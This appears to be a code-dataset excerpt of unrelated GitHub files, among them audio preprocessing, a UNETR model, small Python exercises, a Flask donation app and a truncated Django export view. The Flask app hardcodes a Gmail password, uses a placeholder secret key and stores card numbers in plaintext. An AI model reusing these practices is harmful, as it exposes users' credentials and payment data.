crepe_model: str = \"tiny\"\n sampling_rate: int = 16000\n hop_length: int = 160\n f0_max: int = 1100.0\n f0_min: int = 50.0\n f0_mel_max: Optional[int] = None\n f0_mel_min: Optional[int] = None\n\n\nclass FeatureExtractTask(BaseModel):\n sampling_rate: int = 16000\n hop_length: int = 160\n encoder_path: str\n encoder_output_layer: Literal[9, 12] = 12\n device: str = \"cpu\"\n subset_config: List[DatasetSubsetConfig]\n\n\nclass MelExtractTask(BaseModel):\n sampling_rate: int = 40000\n device: str = \"cpu\"\n vocoder_path: str\n vocoder_type: Literal[\"nsf-hifigan\", \"nsf-hifigan-log10\"] = \"nsf-hifigan\"\n\n\nclass VolumeExtractTask(BaseModel):\n sampling_rate: int = 16000\n hop_length: int = 160\n\n\ndef load_audio(path: str, sr: Optional[int] = None):\n audio, sr = librosa.load(path, sr=sr)\n if len(audio.shape) > 1:\n audio = librosa.to_mono(audio)\n return audio, sr\n\n\ndef write_wave_runner(\n progress: Synchronized, files: List[Tuple[int, str, str]], task_raw: Dict\n):\n task = WriteWaveTask.parse_obj(task_raw)\n slicer = Slicer(\n sr=task.target_sr,\n threshold=-42,\n min_length=1500,\n min_interval=400,\n hop_size=15,\n max_sil_kept=500,\n )\n\n per = 3.7\n overlap = 0.3\n tail = per + overlap\n max = 0.95\n alpha = 0.8\n\n bh, ah = signal.butter(N=5, Wn=48, btype=\"high\", fs=task.target_sr)\n\n for subset_idx, file, dir in files:\n subset_config = task.subset_config[subset_idx]\n waves_dir = os.path.join(dir, DiffusionAudioDataSubset.WAVES_DIR_NAME)\n waves_16k_dir = os.path.join(dir, DiffusionAudioDataSubset.WAVES_16K_DIR_NAME)\n os.makedirs(waves_dir, exist_ok=True)\n os.makedirs(waves_16k_dir, exist_ok=True)\n\n def write_wave(tmp_audio: np.ndarray, filename: str):\n if subset_config.normalize:\n tmp_audio = (tmp_audio / np.abs(tmp_audio).max() * (max * alpha)) + (\n 1 - alpha\n ) * tmp_audio\n else:\n # clip level to max (cause sometimes when floating point decoding)\n audio_min = np.min(tmp_audio)\n if audio_min < -max:\n tmp_audio = tmp_audio / -audio_min * max\n audio_max = np.max(tmp_audio)\n if audio_max > max:\n tmp_audio = tmp_audio / audio_max * max\n\n wavfile.write(\n os.path.join(waves_dir, f\"{filename}.wav\"),\n task.target_sr,\n 
tmp_audio.astype(np.float32),\n )\n\n tmp_audio = librosa.resample(\n tmp_audio, orig_sr=task.target_sr, target_sr=16000, res_type=\"soxr_vhq\"\n )\n wavfile.write(\n os.path.join(waves_16k_dir, f\"{filename}.wav\"),\n 16000,\n tmp_audio.astype(np.float32),\n )\n\n audio, sr = load_audio(file, task.target_sr)\n audio = signal.lfilter(bh, ah, audio)\n if task.slice:\n for audio in slicer.slice(audio):\n i = 0\n while 1:\n start = int(task.target_sr * (per - overlap) * i)\n i += 1\n if len(audio[start:]) > tail * task.target_sr:\n tmp_audio = audio[start : start + int(per * task.target_sr)]\n write_wave(\n tmp_audio,\n f\"{os.path.splitext(os.path.basename(file))[0]}_{i}\",\n )\n else:\n tmp_audio = audio[start:]\n break\n write_wave(\n tmp_audio, f\"{os.path.splitext(os.path.basename(file))[0]}_{i}\"\n )\n else:\n write_wave(audio, os.path.splitext(os.path.basename(file))[0])\n\n progress.value += 1\n\n mute_filepath = os.path.join(waves_dir, \"__mute.wav\")\n mute_16k_filepath = os.path.join(waves_16k_dir, \"__mute.wav\")\n\n if task.write_mute:\n if not os.path.exists(mute_filepath):\n wavfile.write(\n mute_filepath,\n task.target_sr,\n np.zeros(task.target_sr * 3).astype(np.float32),\n )\n if not os.path.exists(mute_16k_filepath):\n wavfile.write(\n mute_16k_filepath,\n 16000,\n np.zeros(16000 * 3).astype(np.float32),\n )\n\n\ndef f0_extract_runner(\n progress: Synchronized, files: List[Tuple[str, str]], task_raw: Dict\n):\n task = F0ExtractTask.parse_obj(task_raw)\n\n for file, dir in files:\n f0_dir = os.path.join(dir, DiffusionAudioDataSubset.F0_DIR_NAME)\n f0_nsf_dir = os.path.join(dir, DiffusionAudioDataSubset.F0_NSF_DIR_NAME)\n os.makedirs(f0_dir, exist_ok=True)\n os.makedirs(f0_nsf_dir, exist_ok=True)\n\n audio, sr = load_audio(file)\n\n n_frames = int(len(audio) // task.hop_length) + 1\n start_frame = int(0 * task.sampling_rate / task.hop_length)\n real_silence_front = start_frame * task.hop_length / task.sampling_rate\n audio = audio[int(np.round(real_silence_front * task.sampling_rate)) :]\n\n def pad(f0):\n if \"crepe\" in task.f0_method:\n f0 = np.array(\n [\n f0[\n int(\n min(\n int(\n np.round(\n n\n * task.hop_length\n / task.sampling_rate\n / 0.005\n )\n ),\n len(f0) - 1,\n )\n )\n ]\n for n in range(n_frames - start_frame)\n ]\n )\n f0 = np.pad(f0, (start_frame, 0))\n else:\n f0 = np.pad(\n f0.astype(np.float32),\n (start_frame, n_frames - len(f0) - start_frame),\n )\n\n return f0\n\n f0 = f0_extractor.compute(\n audio,\n method=task.f0_method,\n sr=sr,\n hop=task.hop_length,\n max=task.f0_max,\n min=task.f0_min,\n )\n f0 = pad(f0)\n np.save(\n os.path.join(f0_nsf_dir, f\"{os.path.basename(file)}.npy\"),\n f0,\n allow_pickle=False,\n )\n coarse = f0_extractor.course(f0, 256)\n coarse = pad(coarse)\n np.save(\n os.path.join(f0_dir, f\"{os.path.basename(file)}.npy\"),\n coarse,\n allow_pickle=False,\n )\n\n progress.value += 1\n\n\ndef feature_extract_runner(\n progress: Synchronized, files: List[Tuple[int, str, str]], task_raw: Dict\n):\n task = FeatureExtractTask.parse_obj(task_raw)\n device = torch.device(task.device)\n encoder = feature_extractor.load_encoder(task.encoder_path, device)[0]\n\n for subset_idx, file, dir in files:\n subset_config = task.subset_config[subset_idx]\n features_dir = os.path.join(dir, DiffusionAudioDataSubset.FEATURES_DIR_NAME)\n os.makedirs(features_dir, exist_ok=True)\n\n audio, sr = load_audio(file)\n audio = torch.from_numpy(audio).float().unsqueeze(0).to(device)\n\n features = feature_extractor.extract(\n audio,\n sr,\n device,\n 
encoder,\n task.encoder_output_layer,\n subset_config.normalize,\n )\n\n if np.isnan(features).sum() != 0:\n logger.warning(f\"{file} contains nan, skip\")\n else:\n np.save(\n os.path.join(\n features_dir, f\"{os.path.splitext(os.path.basename(file))[0]}.npy\"\n ),\n features,\n allow_pickle=False,\n )\n progress.value += 1\n\n\ndef extract_mel_spectrogram_runner(\n progress: Synchronized, files: List[Tuple[str, str]], task_raw: Dict\n):\n task = MelExtractTask.parse_obj(task_raw)\n device = torch.device(task.device)\n vocoder = Vocoder(task.vocoder_type, task.vocoder_path, device)\n for file, dir in files:\n mel_dir = os.path.join(dir, DiffusionAudioDataSubset.MEL_DIR_NAME)\n os.makedirs(mel_dir, exist_ok=True)\n audio, sr = load_audio(file, task.sampling_rate)\n audio = torch.from_numpy(audio).float().unsqueeze(0).to(device)\n mel = vocoder.extract(audio, task.sampling_rate)\n mel = mel.squeeze().to(\"cpu\").numpy()\n np.save(\n os.path.join(mel_dir, f\"{os.path.splitext(os.path.basename(file))[0]}.npy\"),\n mel,\n allow_pickle=False,\n )\n progress.value += 1\n\n\ndef extract_volume_runner(\n progress: Synchronized, files: List[Tuple[str, str]], task_raw: Dict\n):\n task = VolumeExtractTask.parse_obj(task_raw)\n for file, dir in files:\n volumes_dir = os.path.join(dir, DiffusionAudioDataSubset.VOLUME_DIR_NAME)\n os.makedirs(volumes_dir, exist_ok=True)\n audio, sr = load_audio(file, task.sampling_rate)\n volume = volume_extractor.extract_volume(audio, hop_size=task.hop_length)\n np.save(\n os.path.join(\n volumes_dir, f\"{os.path.splitext(os.path.basename(file))[0]}.npy\"\n ),\n volume,\n allow_pickle=False,\n )\n progress.value += 1\n\n\ndef mp_progress_bar(progress: Synchronized, total: int):\n bar = tqdm.tqdm(total=total)\n while progress.value < total:\n bar.n = progress.value\n bar.refresh()\n time.sleep(0.1)\n bar.n = progress.value\n bar.refresh()\n bar.close()\n\n\nclass PreProcessor:\n def __init__(self, dataset: AudioDataset) -> None:\n self.dataset = dataset\n\n def run_progress_proc(\n self,\n target: Callable,\n files: List[Tuple[str, str]],\n args: List[Any],\n max_workers: int = 1,\n ):\n progress = mp.Value(\"i\", 0)\n processes: List[mp.Process] = []\n for i in range(max_workers):\n ps = mp.Process(\n target=target,\n args=(progress, files[i::max_workers], *args),\n )\n processes.append(ps)\n ps.start()\n\n progress_ps = mp.Process(\n target=mp_progress_bar,\n args=(\n progress,\n len(files),\n ),\n )\n progress_ps.start()\n\n for ps in processes:\n ps.join()\n\n progress_ps.kill()\n\n def write_wave(\n self,\n target_sr: int,\n slice: bool = True,\n write_mute: bool = True,\n max_workers: int = 1,\n ):\n files = []\n for i, subset in enumerate(self.dataset.subsets):\n for file in subset.files:\n files.append((i, file, subset.get_processed_dir()))\n\n self.run_progress_proc(\n write_wave_runner,\n files,\n (\n WriteWaveTask(\n target_sr=target_sr,\n slice=slice,\n write_mute=write_mute,\n subset_config=[subset.config for subset in self.dataset.subsets],\n ).dict(),\n ),\n max_workers,\n )\n\n def extract_f0(\n self,\n f0_method: f0_extractor.F0_METHODS_TYPE,\n max_workers: int = 1,\n crepe_model: str = \"tiny\",\n hop_length: int = 160,\n f0_max: int = 1100.0,\n f0_min: int = 50.0,\n f0_mel_max: Optional[int] = None,\n f0_mel_min: Optional[int] = None,\n ):\n files = []\n for subset in self.dataset.subsets:\n for file in subset.get_waves():\n files.append((file, subset.get_processed_dir()))\n\n if \"crepe\" in f0_method:\n max_workers = 1\n\n self.run_progress_proc(\n 
f0_extract_runner,\n files,\n (\n F0ExtractTask(\n f0_method=f0_method,\n crepe_model=crepe_model,\n hop_length=hop_length,\n f0_max=f0_max,\n f0_min=f0_min,\n f0_mel_max=f0_mel_max,\n f0_mel_min=f0_mel_min,\n ).dict(),\n ),\n max_workers,\n )\n\n def extract_features(\n self,\n encoder_path: str,\n hop_length: int = 160,\n encoder_output_layer: int = 12,\n device: Literal[\"cpu\", \"cuda\"] = \"cpu\",\n ):\n files = []\n for i, subset in enumerate(self.dataset.subsets):\n for file in subset.get_waves():\n files.append((i, file, subset.get_processed_dir()))\n\n self.run_progress_proc(\n feature_extract_runner,\n files,\n (\n FeatureExtractTask(\n hop_length=hop_length,\n encoder_path=encoder_path,\n encoder_output_layer=encoder_output_layer,\n device=device,\n subset_config=[subset.config for subset in self.dataset.subsets],\n ).dict(),\n ),\n 1,\n )\n\n def extract_volume(\n self,\n sampling_rate: int,\n hop_length: int = 160,\n max_workers: int = 1,\n ):\n files = []\n for subset in self.dataset.subsets:\n for file in subset.get_waves():\n files.append((file, subset.get_processed_dir()))\n\n self.run_progress_proc(\n extract_volume_runner,\n files,\n (\n VolumeExtractTask(\n sampling_rate=sampling_rate,\n hop_length=hop_length,\n ).dict(),\n ),\n max_workers,\n )\n\n def extract_mel(\n self,\n vocoder_path: str,\n sampling_rate: int,\n vocoder_type: Literal[\"nsf-hifigan\", \"nsf-hifigan-log10\"] = \"nsf-hifigan\",\n device: str = \"cpu\",\n max_workers: int = 1,\n ):\n files = []\n for subset in self.dataset.subsets:\n for file in subset.get_waves():\n files.append((file, subset.get_processed_dir()))\n\n self.run_progress_proc(\n extract_mel_spectrogram_runner,\n files,\n (\n MelExtractTask(\n vocoder_path=vocoder_path,\n sampling_rate=sampling_rate,\n vocoder_type=vocoder_type,\n device=device,\n ).dict(),\n ),\n max_workers,\n )\n","repo_name":"ddPn08/Latopia","sub_path":"latopia/dataset/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":15812,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"61"} +{"seq_id":"2841311336","text":"from napmo.system.elementary_particle import ElementaryParticle\nfrom napmo.gto.basis_set import BasisSet\n\n\ndef test_elementary_particle_interface():\n try:\n a = ElementaryParticle()\n assert False, 'Expecting Failure!'\n except TypeError:\n assert True\n\n a = ElementaryParticle('e-')\n assert a.get('name') == 'electron'\n assert a.get('symbol') == 'e-'\n assert a.get('charge') == -1.\n assert a.get('mass') == 1.\n\n try:\n print(a)\n except:\n raise\n\n try:\n a = ElementaryParticle('MM')\n assert False, 'Expecting Failure!'\n except KeyError:\n assert True\n\n# test_elementary_particle_interface()\n","repo_name":"efposadac/nAPMO","sub_path":"napmo/system/test/test_elementary_particle.py","file_name":"test_elementary_particle.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"5596043625","text":"\nimport os\nfrom collections import defaultdict\nimport pickle\nimport nltk\n\ncorpusdir = \"/Users/fathimakhazana/Documents/IRFinalProject/ParsedFiles/\"\n\ndef get_Tokens(filename):\n file_content = open(corpusdir + filename).read()\n tokens = nltk.word_tokenize(file_content)\n return tokens\n\nunigrams = defaultdict(list)\n\nfor filename in os.listdir(corpusdir):\n count = defaultdict(int)\n for word in get_Tokens(filename):\n count[word]+=1\n for word in count.keys():\n 
unigrams[word].append([filename,count[word]])\n \nwith open('unigrams.pickle','wb') as f:\n pickle.dump(unigrams,f)","repo_name":"khazana/SearchEngine","sub_path":"unigram_indexer.py","file_name":"unigram_indexer.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16944090944","text":"from typing import List\nimport sys\nsys.setrecursionlimit(100000)\n\ninput = sys.stdin.readline\n\ndef find_parent(parent: List[int], x: int) -> int:\n if parent[x] != x:\n parent[x] = find_parent(parent, parent[x])\n return parent[x]\n\ndef union_parent(parent: List[int], a: int, b: int):\n a = find_parent(parent, a)\n b = find_parent(parent, b)\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\nn, m = map(int, input().split())\nparents = [0] * (n + 1)\nfor i in range(n + 1):\n parents[i] = i\nfor i in range(m):\n fc, a, b = map(int, input().split())\n if fc == 1:\n if find_parent(parents, a) == find_parent(parents, b):\n print(\"YES\")\n else:\n print(\"NO\")\n else:\n union_parent(parents, a, b)\n","repo_name":"Y-Joo/Baekjoon-Algorithm","sub_path":"pythonProject/UnionFind/UnionFind.py","file_name":"UnionFind.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71234787714","text":"\"\"\"Based on code by Dhruv Govil\"\"\"\n\nfrom PySide2 import QtWidgets, QtCore\nimport sys\n\n\nclass QCheckableList(QtWidgets.QWidget):\n \"\"\"\n Extends QWidget to create a clickable palette.\n A QCheckableList object is composed by a group and a QTreeWidget used as list of items, each with a checkbox.\n \"\"\"\n def __init__(self, title, items=()):\n super(QCheckableList, self).__init__()\n\n self.items = items\n\n layout = QtWidgets.QGridLayout(self)\n\n group = QtWidgets.QGroupBox(title)\n group_layout = QtWidgets.QVBoxLayout(group)\n layout.addWidget(group, 0, 0, 3, 3)\n\n tree = self.tree = QtWidgets.QTreeWidget()\n tree.setHeaderHidden(True)\n group_layout.addWidget(tree)\n\n for i in self.items:\n item = QtWidgets.QTreeWidgetItem()\n item.setText(0, i)\n item.setCheckState(0, QtCore.Qt.Unchecked)\n tree.addTopLevelItem(item)\n\n test_button = QtWidgets.QPushButton(\"Button\")\n test_button.clicked.connect(self.update_items)\n layout.addWidget(test_button, 3, 1)\n\n def get_selected_items(self):\n root = self.tree.invisibleRootItem()\n selected_items = []\n selected_items_texts = []\n for i in range(root.childCount()):\n item = root.child(i)\n if item.checkState(0):\n selected_items.append(item)\n selected_items_texts.append(item.text(0))\n\n return selected_items, selected_items_texts\n\n def update_items(self):\n root = self.tree.invisibleRootItem()\n for item in root.takeChildren():\n root.removeChild(item)\n\n for i in self.items:\n item = QtWidgets.QTreeWidgetItem()\n item.setText(0, i)\n item.setCheckState(0, QtCore.Qt.Unchecked)\n self.tree.addTopLevelItem(item)\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n\n items = (\"monitor\", \"mouse\", \"keyboard\", \"pippo\", \"pluto\", \"paperino\", \"topolino\", \"belin\", \"belan\")\n w = QCheckableList(\"prova\", items)\n w.show()\n\n sys.exit(app.exec_())\n\n","repo_name":"DanieleBerna/pyside2-kit","sub_path":"pyside2kit/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"19716781614","text":"from 
flask import Flask, request, flash, url_for, redirect, render_template\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_mail import Mail, Message\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///register.sqlite3'\r\napp.config['SECRET_KEY'] = \"random string\"\r\n\r\ndb = SQLAlchemy(app)\r\n\r\napp.config.update(\r\n DEBUG=True,\r\n #EMAIL SETTINGS\r\n MAIL_SERVER='smtp.gmail.com',\r\n MAIL_PORT=465,\r\n MAIL_USE_SSL=True,\r\n MAIL_USERNAME = 'harjot.kaur.panag@gmail.com',\r\n MAIL_PASSWORD = 'SOKHAJEHA'\r\n )\r\n\r\nmail = Mail(app)\r\n\r\nclass register(db.Model):\r\n id = db.Column('register_id', db.Integer, primary_key = True)\r\n first = db.Column(db.String(100))\r\n email = db.Column(db.String(200), unique=True)\r\n\r\n def __init__(self,first,email):\r\n self.first=first\r\n self.email=email\r\n\r\nclass post(db.Model):\r\n id = db.Column('post_id', db.Integer, primary_key = True)\r\n fullname = db.Column(db.String(20))\r\n email = db.Column(db.String(20))\r\n phoneno = db.Column(db.String(20))\r\n itemname= db.Column(db.String(20))\r\n pickuptime = db.Column(db.String(20))\r\n address = db.Column(db.String(20))\r\n expire = db.Column(db.String(20))\r\n description = db.Column(db.String(500))\r\n\r\n def __init__(self,fullname,email,phoneno,itemname,pickuptime,address,expire,description):\r\n self.fullname=fullname\r\n self.email=email\r\n self.phoneno=phoneno\r\n self.itemname=itemname\r\n self.pickuptime=pickuptime\r\n self.address=address\r\n self.expire=expire\r\n self.description=description\r\n\r\nclass donation(db.Model):\r\n id = db.Column('donation_id', db.Integer, primary_key = True)\r\n firstname = db.Column(db.String(20))\r\n lastname = db.Column(db.String(20))\r\n demail= db.Column(db.String(20))\r\n dphoneno = db.Column(db.String(20))\r\n daddress = db.Column(db.String(20))\r\n cardno = db.Column(db.String(20), unique=True)\r\n amount = db.Column(db.String(20))\r\n check = db.Column(db.String(50))\r\n\r\n def __init__(self,firstname,lastname,demail,dphoneno,daddress,cardno,amount,check):\r\n self.firstname=firstname\r\n self.lastname=lastname\r\n self.demail=demail\r\n self.dphoneno=dphoneno\r\n self.daddress=daddress\r\n self.cardno=cardno\r\n self.amount=amount\r\n self.check=check\r\n\r\n\r\n@app.route('/')\r\ndef all_main():\r\n return render_template('index.html')\r\n\r\n@app.route('/show_all')\r\ndef show_all():\r\n return render_template('get.html', post=post.query.all())\r\n@app.route('/about')\r\ndef about():\r\n return render_template('about.html')\r\n# @app.route('/u')\r\n# def u():\r\n# result=donation.query.all()\r\n# return render_template('show_all.html',result=result)\r\n\r\n@app.route('/new', methods = ['GET', 'POST'])\r\ndef new():\r\n if request.method == 'POST':\r\n if not request.form['Name'] or not request.form['email']:\r\n flash('Please enter all the fields', 'error')\r\n else:\r\n registers = register(first=request.form['Name'], email=request.form['email'])\r\n\r\n db.session.add(registers)\r\n db.session.commit()\r\n flash('Record was successfully added')\r\n # return redirect(url_for('all_main'))\r\n return render_template('register.html')\r\n\r\n@app.route('/dny', methods = ['GET', 'POST'])\r\ndef dny():\r\n if request.method == 'POST':\r\n if not request.form['Fname'] or not request.form['Lname'] or not request.form['Email'] or not request.form['Telephone'] or not request.form['Address'] or not request.form['CardNumber'] or not request.form['Amount'] or not request.form['check']:\r\n 
flash('Please enter all the fields', 'error')\r\n else:\r\n donations = donation(firstname=request.form['Fname'], lastname=request.form['Lname'], demail=request.form['Email'], dphoneno=request.form['Telephone'], daddress=request.form['Address'], cardno=request.form['CardNumber'], amount=request.form['Amount'], check=request.form['check'])\r\n\r\n db.session.add(donations)\r\n db.session.commit()\r\n flash('Record was successfully added')\r\n # return redirect(url_for('all_main'))\r\n return render_template('donation.html')\r\n\r\n\r\n@app.route('/postfood', methods = ['GET', 'POST'])\r\ndef postfood():\r\n if request.method == 'POST':\r\n if not request.form['name'] or not request.form['email'] or not request.form['Phoneno'] or not request.form['itemname'] or not request.form['PickUpTime'] or not request.form['Address'] or not request.form['Expire'] or not request.form['comments']:\r\n flash('Please enter all the fields', 'error')\r\n else:\r\n posts = post(fullname=request.form['name'], email=request.form['email'],\r\n phoneno=request.form['Phoneno'], itemname=request.form['itemname'], pickuptime=request.form['PickUpTime'], address=request.form['Address'], expire=request.form['Expire'], description=request.form['comments'])\r\n users=register.query.all()\r\n emails = []\r\n for em in users:\r\n emails.append(em.email)\r\n msg = Message(\r\n 'Hello',\r\n sender='harjot.kaur.panag@gmail.com',\r\n recipients=emails)\r\n msg.body = posts.address\r\n msg.body += posts.description\r\n mail.send(msg)\r\n\r\n db.session.add(posts)\r\n db.session.commit()\r\n flash('Record was successfully added')\r\n # return redirect(url_for('show_all'))\r\n return render_template('post.html')\r\n\r\nif __name__ == '__main__':\r\n db.create_all()\r\n app.run(debug = True)\r\n","repo_name":"sethibadhan/FoodToFeed","sub_path":"register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33728693022","text":"import os\nimport json\n\nstudent = []\n\nfile = open(\"student.txt\", 'r').read().split(\"\\n\")\n\nif '' in file:\n file.remove('')\nelse:\n pass\n\nif len(file) == 0:\n pass\nelse:\n for i in range(len(file)):\n student.append(file[i])\n\nstring = \"\"\"\n\n1. New Student\n2. Mark a Student\n3. Print All\n4. 
Exit\n\n\"\"\"\n\nprint(string)\n\n\ndef NStudent(name):\n if len(student) == 0:\n open(\"student.txt\", 'a').write('{}'.format(name))\n else:\n open(\"student.txt\", 'a').write('\\n{}'.format(name))\n student.append(name)\n\ndef MStudent(name, mark):\n mark = int(mark)\n if name in student:\n with open(\"student.json\", \"r+\") as jsonFile:\n data = json.load(jsonFile)\n\n data[\"{}\".format(name)] = mark\n\n jsonFile.seek(0)\n json.dump(data, jsonFile)\n jsonFile.truncate()\n jsonFile.close()\n else:\n print(f\"The student `{name}` does not exist!\")\n\ndef PStudent():\n if len(student) == 0:\n print(\"No student found!\")\n else:\n for i in range(len(student)):\n f = open('student.json', 'r')\n data = f.read()\n f.close()\n if student[i] in data:\n std = json.loads( data )[student[i]]\n print('{}:{}'.format(student[i], std))\n else:\n print(f'Student `{student[i]}` is not marked')\n\nwhile True:\n inp = int(input(\"Enter your choice: \"))\n\n if inp == 1:\n NStudent(input(\"Enter Student Name: \"))\n elif inp == 2:\n MStudent(name=input(\"Enter Student Name: \"), mark=input(\"Enter your Mark: \"))\n elif inp == 3:\n PStudent()\n elif inp == 4:\n exit()\n else:\n print(\"Your Choice is not valid\")\n","repo_name":"PC-baz/student","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36481025636","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nfrom models.networks_other import init_weights\nfrom models.mymod.utils import UNetConv3D, UNETRSkip\nimport numpy as np\n\n\n\nclass UNETR(nn.Module):\n\n def __init__(self, filters = [64, 128, 256, 512], d_model=768, input_shape= (512,512,512), patch_size=(16,16,16), skip_idx = [3,6,9,12], n_classes=2, in_channels=1, n_heads=8, bn = True, up_mode='deconv', n_layers=12):\n super(UNETR, self).__init__()\n print(\"UNETR\")\n\n self.in_channels = in_channels\n self.d_model = d_model\n self.n_heads = n_heads\n self.input_shape = input_shape\n self.patch_size = patch_size\n self.n_layers = n_layers\n self.filters = list(filters) # copy so the mutable default argument is not modified in place\n self.filters.reverse()\n self.skip_idx = skip_idx\n\n self.emb_size_reshape = [int(i/j) for i,j in zip(self.input_shape, self.patch_size)] + [np.prod(self.patch_size)]\n self.emb_size_flat = [np.prod(self.emb_size_reshape[:3]), self.emb_size_reshape[3]]\n print('self.emb_size_reshape', self.emb_size_reshape)\n print('self.emb_size_flat', self.emb_size_flat)\n # Encoders\n self.lin = nn.Linear(self.emb_size_reshape[3], self.d_model)\n self.ListTrans = []\n for i in range(self.n_layers):\n encoder_layer = nn.TransformerEncoderLayer(d_model=self.d_model, nhead=self.n_heads)\n self.ListTrans.append(nn.TransformerEncoder(encoder_layer, 1))\n self.TransModuleList = nn.ModuleList(self.ListTrans) \n\n # Skips\n self.skip0 = UNetConv3D(self.in_channels, self.filters[3], bn=bn)\n self.skip1 = UNETRSkip(self.d_model, self.filters[:3], bn=bn)\n self.skip2 = UNETRSkip(self.d_model, self.filters[:2], bn=bn)\n self.skip3 = UNETRSkip(self.d_model, self.filters[:1], bn=bn)\n\n\n # Upsamplers\n self.up_concat4 = nn.ConvTranspose3d(self.d_model, self.filters[0], 2, stride = 2)\n self.up_concat3 = nn.Sequential(*[UNetConv3D(self.filters[0]*2,self.filters[1], bn=bn), nn.ConvTranspose3d(self.filters[1], self.filters[1], (2,2,2), stride = (2,2,2))])\n self.up_concat2 = 
nn.Sequential(*[UNetConv3D(self.filters[1]*2,self.filters[2], bn=bn), nn.ConvTranspose3d(self.filters[2], self.filters[2], (2,2,2), stride = (2,2,2))])\n self.up_concat1 = nn.Sequential(*[UNetConv3D(self.filters[2]*2,self.filters[3], bn=bn), nn.ConvTranspose3d(self.filters[3], self.filters[3], (2,2,2), stride = (2,2,2))])\n\n # final conv (without any concat)\n self.final = nn.Sequential(*[UNetConv3D(self.filters[3]*2,n_classes, bn=bn), nn.Conv3d(n_classes, n_classes, kernel_size=1)])\n\n # initialise weights\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose3d) or isinstance(m, nn.Conv3d) or isinstance(m, nn.TransformerEncoderLayer):\n init_weights(m, init_type='kaiming')\n\n\n def forward(self, X, mode=None):\n bs = X.shape[0]\n # X = X[:, None, ...]\n\n sk0 = self.skip0(X)\n\n \n \n sk123 = []\n emb_size_reshape = [bs] + self.emb_size_reshape\n emb_size_reshape_trans = emb_size_reshape[:4]+ [self.d_model]\n emb_size_flat = [bs] + self.emb_size_flat\n # Get patches, flat and project\n X = torch.reshape(X, emb_size_reshape)\n X = torch.reshape(X, emb_size_flat)\n X = self.lin(X)\n\n\n # Go through transformers and save reshaped skip\n for i in range(self.n_layers):\n X = self.ListTrans[i](X.permute(1,0,2))\n if i+1 in self.skip_idx:\n sk123.append(torch.reshape(X.permute(1,0,2), emb_size_reshape_trans).permute(0,4,1,2,3))\n\n # Decode\n X = self.up_concat4(sk123[3])\n X = self.up_concat3(torch.cat([self.skip3(sk123[2]), X],1))\n X = self.up_concat2(torch.cat([self.skip2(sk123[1]), X],1))\n X = self.up_concat1(torch.cat([self.skip1(sk123[0]), X],1))\n\n # Final\n X = self.final(torch.cat([sk0, X], 1))\n \n\n # print(X.shape)\n # exit(0)\n return X\n\n @staticmethod\n def apply_argmax_softmax(pred):\n log_p = F.softmax(pred, dim=1)\n\n return log_p\n\n\n\ndef convert_bytes(size):\n for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:\n if size < 1024.0:\n return \"%3.2f %s\" % (size, x)\n size /= 1024.0\n\n return size\n\n","repo_name":"Myyyr/segmentation3D","sub_path":"models/mymod/UNETR.py","file_name":"UNETR.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2984572665","text":"def sample_with_list():\n # example with a list\n array = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n for x in array:\n print(x)\n\n\ndef sample_with_generator():\n # example with a generator\n for x in range(10):\n print(x)\n\n\ndef 
generator_manual_iteration():\n range_generator = range(10).__iter__()\n print(range_generator.__next__())\n print(range_generator.__next__())\n print(next(range_generator))\n print(next(range_generator))\n # what happens when we reach the end?\n\n\ndef string_generator():\n yield 'Ala'\n yield 'ma'\n yield 'kota'\n\n\ndef string_generator_sample():\n gen = string_generator()\n print(gen.__next__())\n print(gen.__next__())\n print(gen.__next__())\n try:\n print(gen.__next__())\n except StopIteration:\n print('Exception occurred!')\n\n\nif __name__ == '__main__':\n # sample_with_list()\n # sample_with_generator()\n generator_manual_iteration()\n\n string_generator_sample()\n","repo_name":"Oleksandr015/Algorytmy","sub_path":"AISD/generators/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27057108288","text":"from csv import DictWriter\nfrom datetime import datetime\nfrom itertools import chain\n\nfrom django.db import models\nfrom django.db.models.functions import Concat\nfrom django.http import StreamingHttpResponse\nfrom rest_framework import permissions\n\nfrom .expenses import ExpensesEndpoint\nfrom .ticket_exports import TicketExportsEndpoint, DummyBuffer\n\n\nclass ExpenseExportsEndpoint(ExpensesEndpoint):\n permission_classes = (permissions.IsAdminUser, )\n\n def list(self, request, *args, **kwargs):\n queryset = self.filter_queryset(self.get_queryset())\n\n ticket_url = \\\n TicketExportsEndpoint.TICKET_URI.format(self.request.get_host())\n\n cols = dict(\n Link=Concat(\n models.Value(ticket_url),\n models.F('ticket_id'),\n output_field=models.CharField()\n ),\n Date=models.F('created_at'),\n Status=models.F('ticket__status'),\n Amount=models.F('amount'),\n Currency=models.F('amount_currency'),\n Rating=models.F('rating'),\n Scope=models.F('scope'),\n RequesterCountry=models.F('ticket__requester__country'),\n 